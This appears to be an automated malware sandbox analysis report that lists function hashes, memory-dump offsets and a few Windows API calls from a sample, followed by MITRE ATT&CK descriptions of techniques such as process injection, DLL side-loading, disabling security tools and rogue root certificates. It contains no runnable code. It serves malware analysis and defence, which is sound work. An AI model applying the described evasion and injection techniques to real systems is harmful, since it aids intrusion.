Instruction ID: b67e487d347104eebafcb7a63f2ccbd9b216e251bb4e8a15ed563e2a9fc683a9
Opcode Fuzzy Hash: 885fca99c4e4c55fdcf41e3dd4e21b0e5fc8abf188ca23fb455245bc1f8e52fd
Instruction Fuzzy Hash: 1022C031A002099FDB51EF68D881B9EBBF2EF86310F158569E505DB291DB31ED4ACBD0

Function 0634A3B7 Relevance: .3, Instructions: 314COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.2122598757.0000000006340000.00000040.00000800.00020000.00000000.sdmp, Offset: 06340000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_6340000_XBckuYbXje.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 47c807b992b26bbbb4fbb1b8a6762e7d99d8b50b1b8d878ac9335c82d5fe4cd3
Instruction ID: 76e89313e5adf1b8c09045ea8acf6e195bb7147919b3b7766d05ea5e336c4fa1
Opcode Fuzzy Hash: 47c807b992b26bbbb4fbb1b8a6762e7d99d8b50b1b8d878ac9335c82d5fe4cd3
Instruction Fuzzy Hash: 63D10634D00318CFDB58EFB4D854A9DBBB2FF8A301F2095A9D50AAB258DB315986CF51

Function 05130BFC Relevance: 1.6, APIs: 1, Instructions: 97
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CallWindowProcW.USER32(?,?,?,?,?), ref: 05134381

Memory Dump Source

Source File: 0000001C.00000002.2120523979.0000000005130000.00000040.00000800.00020000.00000000.sdmp, Offset: 05130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_5130000_XBckuYbXje.jbxd

Similarity

API ID: CallProcWindow
String ID:
API String ID: 2714655100-0
Opcode ID: edec88420465b711e1d1725ecf373834353867d75756872deee1a583520b20c4
Instruction ID: f9e36c730f858e43b25ff5ba0ca1c1fbd733f92024e7e140dc0754faaf138f3c
Opcode Fuzzy Hash: edec88420465b711e1d1725ecf373834353867d75756872deee1a583520b20c4
Instruction Fuzzy Hash: C64126B49003198FDB14CF99C889AAEBBF5FF88314F258559E519AB321D774A841CFA0

Function 07983350 Relevance: 1.6, APIs: 1, Instructions: 52windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,?,?,?), ref: 079833B5

Memory Dump Source

Source File: 0000001C.00000002.2143607304.0000000007980000.00000040.00000800.00020000.00000000.sdmp, Offset: 07980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_7980000_XBckuYbXje.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: bdf9c799bcc0a3b04a62c67ddf0bf1a141234a5d6ff95f3c0024086d98ea91a6
Instruction ID: 29ed78ce28eaa617e71663e86784076471fb57ec8ad777ac4c2b9b1ff2c8d586
Opcode Fuzzy Hash: bdf9c799bcc0a3b04a62c67ddf0bf1a141234a5d6ff95f3c0024086d98ea91a6
Instruction Fuzzy Hash: 0611F3B58042499FDB10DF99D985BDEBFF8EB48324F20891AE514A7240C375A544CFA5

Function 07983358 Relevance: 1.5, APIs: 1, Instructions: 44windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,?,?,?), ref: 079833B5

Memory Dump Source

Source File: 0000001C.00000002.2143607304.0000000007980000.00000040.00000800.00020000.00000000.sdmp, Offset: 07980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_7980000_XBckuYbXje.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 41e4e62e1d97aebd01fef47642facfb8387dbe1c8422a4e4bc52d0158729ac5e
Instruction ID: 0141a644d74a4996b8d8ef304c46ccdebb52be01eec25d231e1c77e269507bec
Opcode Fuzzy Hash: 41e4e62e1d97aebd01fef47642facfb8387dbe1c8422a4e4bc52d0158729ac5e
Instruction Fuzzy Hash: 2D11E2B58003499FDB20DF9AD985BDEFBF8EB48324F10841AE518A7340D379A944CFA1

Function 063484C8 Relevance: 1.4, Strings: 1, Instructions: 102COMMON

Download Yara Rule

Strings

4'q, xrefs: 063485B1

Memory Dump Source

Source File: 0000001C.00000002.2122598757.0000000006340000.00000040.00000800.00020000.00000000.sdmp, Offset: 06340000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_6340000_XBckuYbXje.jbxd

Similarity

API ID:
String ID: 4'q
API String ID: 0-1807707664
Opcode ID: 77fa4a00177f3aa5f32eaaf9092e7c15c2ab967731ea6a30f70afe250c1226a3
Instruction ID: 4005bd1c679b854005028b53f6d93697d98ac1eb05546be8f518e364839bf30c
Opcode Fuzzy Hash: 77fa4a00177f3aa5f32eaaf9092e7c15c2ab967731ea6a30f70afe250c1226a3
Instruction Fuzzy Hash: 6831BE30B012059FDB59AB78A85416E77E3EFC8205714447DD607CB384EE34DD0687E2

Function 0634B2D9 Relevance: 1.3, Strings: 1, Instructions: 50COMMON

Download Yara Rule

Strings

4'q, xrefs: 0634B399

Memory Dump Source

Source File: 0000001C.00000002.2122598757.0000000006340000.00000040.00000800.00020000.00000000.sdmp, Offset: 06340000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_6340000_XBckuYbXje.jbxd

Similarity

API ID:
String ID: 4'q
API String ID: 0-1807707664
Opcode ID: dd1dd9c13145aa0823aa87d9620d4c3e20ab6ae1cfcde6d9710e5c5deefcd873
Instruction ID: d6f10611a6285106a47480d57186640e3d822c92aadb01b23e9d7ab011cceea0
Opcode Fuzzy Hash: dd1dd9c13145aa0823aa87d9620d4c3e20ab6ae1cfcde6d9710e5c5deefcd873
Instruction Fuzzy Hash: 7B11C83490A3859FCB12EF78D99865CBFB1AF42204F1844DEE8868B257DA345A09CB51

Function 0634B358 Relevance: 1.3, Strings: 1, Instructions: 40COMMON

Download Yara Rule

Strings

4'q, xrefs: 0634B399

Memory Dump Source

Source File: 0000001C.00000002.2122598757.0000000006340000.00000040.00000800.00020000.00000000.sdmp, Offset: 06340000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_6340000_XBckuYbXje.jbxd

Similarity

API ID:
String ID: 4'q
API String ID: 0-1807707664
Opcode ID: 9a2d7830bb0eae24796c38f56e80ce09a719adf3e32bd59cad3b47dfd00ebdfa
Instruction ID: 5eee4fa29729aebb6fb18b9cc1f2f0ca22e8a5bd3340a9104d04ce695bb50239
Opcode Fuzzy Hash: 9a2d7830bb0eae24796c38f56e80ce09a719adf3e32bd59cad3b47dfd00ebdfa
Instruction Fuzzy Hash: 3001B534906389AFCB01EFB8E48964CBFB2AF45200B1405AED886D7257DB301E49CB51

Function 0634B368 Relevance: 1.3, Strings: 1, Instructions: 32COMMON

Download Yara Rule

Strings

4'q, xrefs: 0634B399

Memory Dump Source

Source File: 0000001C.00000002.2122598757.0000000006340000.00000040.00000800.00020000.00000000.sdmp, Offset: 06340000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_6340000_XBckuYbXje.jbxd

Similarity

API ID:
String ID: 4'q
API String ID: 0-1807707664
Opcode ID: 11570b05bb2aec6bfc68ff6fdd0cecb29b4e937b274c5422015fd19ced3219be
Instruction ID: e178e8d37bd46e3f6c93e446b27931fab274f578ace0992a2e5d5c16dafbccd5
Opcode Fuzzy Hash: 11570b05bb2aec6bfc68ff6fdd0cecb29b4e937b274c5422015fd19ced3219be
Instruction Fuzzy Hash: B4F04F74E01208EFCB44EFB8E98955CBFB2FF44301B1455A9E90A97316EB306E49CB45

Function 06345579 Relevance: .1, Instructions: 105COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.2122598757.0000000006340000.00000040.00000800.00020000.00000000.sdmp, Offset: 06340000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_6340000_XBckuYbXje.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 12ca201b502d6bf29cda994845246a96896a453775bd428fe8778d89192eaa64
Instruction ID: bc62c68066d87c29585ac59c5a46aea2df4468cabda334a0629f62d7850d5a07
Opcode Fuzzy Hash: 12ca201b502d6bf29cda994845246a96896a453775bd428fe8778d89192eaa64
Instruction Fuzzy Hash: 55416734B012109FCB55EF34D8849AEBBF2BF8A240B5485A9E905CB356DB30ED06CB91

Function 06345588 Relevance: .1, Instructions: 96COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.2122598757.0000000006340000.00000040.00000800.00020000.00000000.sdmp, Offset: 06340000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_6340000_XBckuYbXje.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c52d03f38748696ba39e13a751a936c01878645e1883f7b148a603e12b5d5ae0
Instruction ID: 7e5999992a42d09cfa11bfa3bbcbea2d6ea9fbf9e2917a34b0ee525744eb0dc2
Opcode Fuzzy Hash: c52d03f38748696ba39e13a751a936c01878645e1883f7b148a603e12b5d5ae0
Instruction Fuzzy Hash: 81314234B012109FCB55EF34D884AAEBBF2BF89251B408469E9068B355DB30ED06CB90

Function 063487A0 Relevance: .1, Instructions: 93COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.2122598757.0000000006340000.00000040.00000800.00020000.00000000.sdmp, Offset: 06340000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_6340000_XBckuYbXje.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b1eddf0f4c1b431e752d0c7e4e7116243448c402427737d6cb604f08a63aeb55
Instruction ID: fa59227e3a56395f375e29b58d7cbbddfae1a07eb499ccc0afa6804b3cd53a67
Opcode Fuzzy Hash: b1eddf0f4c1b431e752d0c7e4e7116243448c402427737d6cb604f08a63aeb55
Instruction Fuzzy Hash: D541F471D01248DFDB14EFAAD940ADEFFF6AF88310F10802AE415A7254DB35A945CF90

Function 06348797 Relevance: .1, Instructions: 80COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.2122598757.0000000006340000.00000040.00000800.00020000.00000000.sdmp, Offset: 06340000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_6340000_XBckuYbXje.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c1ee691777efd1e9b242ce7851d09752004b2e4580e08b4f96937d048813792a
Instruction ID: 88ad7eb1441b19c26ddaded7c3f15c7131fa95db451be75b0925844f87e2231e
Opcode Fuzzy Hash: c1ee691777efd1e9b242ce7851d09752004b2e4580e08b4f96937d048813792a
Instruction Fuzzy Hash: 3A3112B1D012489FDB24EFAAC944BDEFFF6AF48310F14812AE415A7290DB34A945CF90

Function 00F6D3D8 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.2076483191.0000000000F6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F6D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_f6d000_XBckuYbXje.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ee66b0addfe3730413d1e090df4e68e4861d01c3ffaf6439ae46de9a279de085
Instruction ID: 02ca2cdc79eda90166db106ad21f09416450e68a457232f282412275b50d150c
Opcode Fuzzy Hash: ee66b0addfe3730413d1e090df4e68e4861d01c3ffaf6439ae46de9a279de085
Instruction Fuzzy Hash: B1212572E04244DFDB14DF10D9C0B16BB65FB98324F24C169E8090F256C736EC56EBA2

Function 00F7D01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.2076861884.0000000000F7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F7D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_f7d000_XBckuYbXje.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 123c0b57b199c9049db403abbb770870f245d0a1e025615a7b7f8b48a6df963c
Instruction ID: f8722093cb31ae24d11f90c79ff13c57cd18d0fb1b92fc6c6d0a54b4fb6bee60
Opcode Fuzzy Hash: 123c0b57b199c9049db403abbb770870f245d0a1e025615a7b7f8b48a6df963c
Instruction Fuzzy Hash: C821D076A04200DFDB14DF14D984B16BB75EF84324F64C56ED84E4B28AC336D847DA62

Function 00F7D005 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.2076861884.0000000000F7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F7D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_f7d000_XBckuYbXje.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d795fa28158a147176585e4a79dbbe72c4be3e34dd747e19202158c53ccb58d4
Instruction ID: 4bd2f1a210db96a06e60e0b7c0cac4f06247f605b888fc2e25b41a2ac04483c3
Opcode Fuzzy Hash: d795fa28158a147176585e4a79dbbe72c4be3e34dd747e19202158c53ccb58d4
Instruction Fuzzy Hash: 1E2150755093808FCB16CF24D994715BF71EF46324F28C5EBD8498B6A7C33A980ACB62

Function 00F6D3D3 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.2076483191.0000000000F6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F6D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_f6d000_XBckuYbXje.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 099256442a3ab3004f72329a4e4b6c70090b87d396c4978555b43c732be305a7
Instruction ID: c95996ac6814a3a92779bc438d5b2cc166cc6428b0a9464689dde529b81bfa31
Opcode Fuzzy Hash: 099256442a3ab3004f72329a4e4b6c70090b87d396c4978555b43c732be305a7
Instruction Fuzzy Hash: B3112676A04240CFCB05CF00D5C0B16BF72FB94324F24C2A9D8090B257C33AE856DBA1

Function 06348350 Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.2122598757.0000000006340000.00000040.00000800.00020000.00000000.sdmp, Offset: 06340000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_6340000_XBckuYbXje.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8877d9ba44cd69ee4d069ea7265494d28e67f60c30d9cd3d312ac33c10a46c46
Instruction ID: 8011a84c932563ab568ab555a514a027dc0da8f8ab663204dde1cd8c266ca072
Opcode Fuzzy Hash: 8877d9ba44cd69ee4d069ea7265494d28e67f60c30d9cd3d312ac33c10a46c46
Instruction Fuzzy Hash: 62018431B002199FDB10EEA9EC44ABFF7FAEBC4251B144036E605D3240DB30A91697B1

Function 0634C499 Relevance: .0, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.2122598757.0000000006340000.00000040.00000800.00020000.00000000.sdmp, Offset: 06340000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_6340000_XBckuYbXje.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 53286529383584a730b5138676a9c35039d0d067d58276ba6f5137652bb3bac1
Instruction ID: 10039fb48a1e2228b24e8184fa8bd748a81150c8821fd5eee0f2706fec17f97c
Opcode Fuzzy Hash: 53286529383584a730b5138676a9c35039d0d067d58276ba6f5137652bb3bac1
Instruction Fuzzy Hash: 9E11E5302047454FD321AF38E45821E7BF3EFC5305B14892EE48687686CF74A90A8B91

Function 0634C4A8 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.2122598757.0000000006340000.00000040.00000800.00020000.00000000.sdmp, Offset: 06340000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_6340000_XBckuYbXje.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4a96c6bce6710954607ff22015fa238fb8abf42a83f19234c01d5a7654859d0a
Instruction ID: db5eb8d9f72a5a9d896198c6638e09feec9e11ae2177c021535f2f7eb21321d6
Opcode Fuzzy Hash: 4a96c6bce6710954607ff22015fa238fb8abf42a83f19234c01d5a7654859d0a
Instruction Fuzzy Hash: A101B1346007048FD324EF69E44865E7BE3EFC5316F108A28E14B87745CF74A90A8B91

Function 06345508 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.2122598757.0000000006340000.00000040.00000800.00020000.00000000.sdmp, Offset: 06340000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_6340000_XBckuYbXje.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3452b2cb422a5fab0d4e3da0b3bac6ffe82cfca9a6c2f1d63dca14b8d7d68462
Instruction ID: 5a5e5843015ac5675b0d6f091f451bdff332ede22e05e3bbbe9cf46f2d59c4bf
Opcode Fuzzy Hash: 3452b2cb422a5fab0d4e3da0b3bac6ffe82cfca9a6c2f1d63dca14b8d7d68462
Instruction Fuzzy Hash: 63016D30E11712CFDBA9AA25A504637F7E7BF8422571498A8E40786A54DE71F489CBD0

Function 063467C0 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.2122598757.0000000006340000.00000040.00000800.00020000.00000000.sdmp, Offset: 06340000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_6340000_XBckuYbXje.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c9f81fa33c6b54077988eff67fea3e57806361dc02769b075df1fccc7a468600
Instruction ID: eace670b111dec030c5f6b913cc941dea6eab7b2d26fea3882e65d3424320cf8
Opcode Fuzzy Hash: c9f81fa33c6b54077988eff67fea3e57806361dc02769b075df1fccc7a468600
Instruction Fuzzy Hash: 4FF0C231A043005FDB209A289C05F45BFE59B83710F14C16AF250CB1A2D6A1E809D380

Function 063454F8 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.2122598757.0000000006340000.00000040.00000800.00020000.00000000.sdmp, Offset: 06340000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_6340000_XBckuYbXje.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0fc27920a0e0fa7ac1b6960d81f1ea1ba7095cab1e5c26bdbfa5f2b18aff40da
Instruction ID: 61d3bf3e07dbe3d033fada8b9a0baf87c9764cbafa1456b341eb315f24a51ace
Opcode Fuzzy Hash: 0fc27920a0e0fa7ac1b6960d81f1ea1ba7095cab1e5c26bdbfa5f2b18aff40da
Instruction Fuzzy Hash: 95F0CD309053818FDBA6AE20D5406B7BFF2AF81224B0895DEE08646926CB75F489CB80

Function 06348341 Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.2122598757.0000000006340000.00000040.00000800.00020000.00000000.sdmp, Offset: 06340000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_6340000_XBckuYbXje.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e252670d9944ac661f67a4441c194366e36bf10bc9ab69d2b80cae51e8f12e19
Instruction ID: 500793d7ebbad097025c6c9453b754f309f102d6a80a06068080e3b7810fad49
Opcode Fuzzy Hash: e252670d9944ac661f67a4441c194366e36bf10bc9ab69d2b80cae51e8f12e19
Instruction Fuzzy Hash: 3EF0A032F101165BCB50AA79AC48AAFBBFAABC5251B08042BD954E3140FB30D91AC7A0

Function 06345698 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.2122598757.0000000006340000.00000040.00000800.00020000.00000000.sdmp, Offset: 06340000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_6340000_XBckuYbXje.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b54a8c47dbbdb0b51831a7d15b003183bbdc6afb1c9aec75a5aa3a8fba762caf
Instruction ID: 1f13c78ff7183330d1900413db49ad57a46ede820838fa5b194761be51588074
Opcode Fuzzy Hash: b54a8c47dbbdb0b51831a7d15b003183bbdc6afb1c9aec75a5aa3a8fba762caf
Instruction Fuzzy Hash: 56E092B250D211AFD340EB31EC44C87BBE9EF91220B01CC6EF040D7141EA35E842C7A5

Function 0634B500 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.2122598757.0000000006340000.00000040.00000800.00020000.00000000.sdmp, Offset: 06340000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_6340000_XBckuYbXje.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a637d98467dc9fdba6ee5d7e77b4fa919686a73b4f6dec0026c529f41e1a906e
Instruction ID: 3a62e245d52c51ccd3f92122877d79aa4cd4231cc55e14a2d715cf17192befef
Opcode Fuzzy Hash: a637d98467dc9fdba6ee5d7e77b4fa919686a73b4f6dec0026c529f41e1a906e
Instruction Fuzzy Hash: E0F03935D0520DAFCB01DFB8D9489CEFFB9EB84200F1082EAE985E3241EA305B55DB81

Function 0634B510 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.2122598757.0000000006340000.00000040.00000800.00020000.00000000.sdmp, Offset: 06340000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_6340000_XBckuYbXje.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 26a78d55cb603df514154e9acdb47b0990fca8262ddd0bc7bf7048b02ad1ca86
Instruction ID: b4859889d63b9c05fec3d2fab71e3f80ebed59559fa9758772ef8d100324065f
Opcode Fuzzy Hash: 26a78d55cb603df514154e9acdb47b0990fca8262ddd0bc7bf7048b02ad1ca86
Instruction Fuzzy Hash: 66E09A75D0020CEFCB40DFE4D5888DDBBB9EB48200F1082A6D905E3210EB305B55DF80

Function 0634E210 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.2122598757.0000000006340000.00000040.00000800.00020000.00000000.sdmp, Offset: 06340000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_6340000_XBckuYbXje.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b8c563ef156fafe1aa1efc8e66281d3a40f3fbeafecd2238acc0ee8735322b4d
Instruction ID: dde43267898097b0b46f9c464a8d0bd58f54811a6dadfcab04c3632af01d2482
Opcode Fuzzy Hash: b8c563ef156fafe1aa1efc8e66281d3a40f3fbeafecd2238acc0ee8735322b4d
Instruction Fuzzy Hash: 50D05E71E0020CFFCB40EFA8E94195DB7BAEF44204B1051A9E509E7200EA312F049B91

Function 0634E280 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.2122598757.0000000006340000.00000040.00000800.00020000.00000000.sdmp, Offset: 06340000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_6340000_XBckuYbXje.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1f0132e500b6326bc47626be27fe0f70ecd735119dd26a2de57cdc38343a82f1
Instruction ID: 5af5fdb1eccee5fa3bcfe9691cf4ae4ab83102e927e11ca167302e4db8a88fab
Opcode Fuzzy Hash: 1f0132e500b6326bc47626be27fe0f70ecd735119dd26a2de57cdc38343a82f1
Instruction Fuzzy Hash: 8BE086305106028FC665FB14F945B58F3E6F784B04F451018E8024B259CB706A4A8781

Function 06343721 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.2122598757.0000000006340000.00000040.00000800.00020000.00000000.sdmp, Offset: 06340000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_6340000_XBckuYbXje.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e0a926aa1056b2cf0a7e3e78baa7f7c14c5d0f15aabc67e5eaf4e521c0a380c5
Instruction ID: fb13c70b4e14e40901e87fc3302f78badfc485d8168ac44b928cf906ee3d463f
Opcode Fuzzy Hash: e0a926aa1056b2cf0a7e3e78baa7f7c14c5d0f15aabc67e5eaf4e521c0a380c5
Instruction Fuzzy Hash: 07D012B500E3C0AFC3171B300C459657FF15BA6741F4A5087E2C4DA193E665441AE753

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Application Log: Application Log Content, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers. Root certificates are used in public key cryptography to identify a root certificate authority (CA). When a root certificate is installed, the system or application will trust certificates in the root's chain of trust that have been signed by the root certificate.Certificates are commonly used for establishing secure TLS/SSL communications within a web browser. When a user attempts to browse a website that presents a certificate that is not trusted an error message will be displayed to warn the user of the security risk. Depending on the security settings, the browser may not allow the user to establish a connection to the website.
Tactics:	Defense Evasion
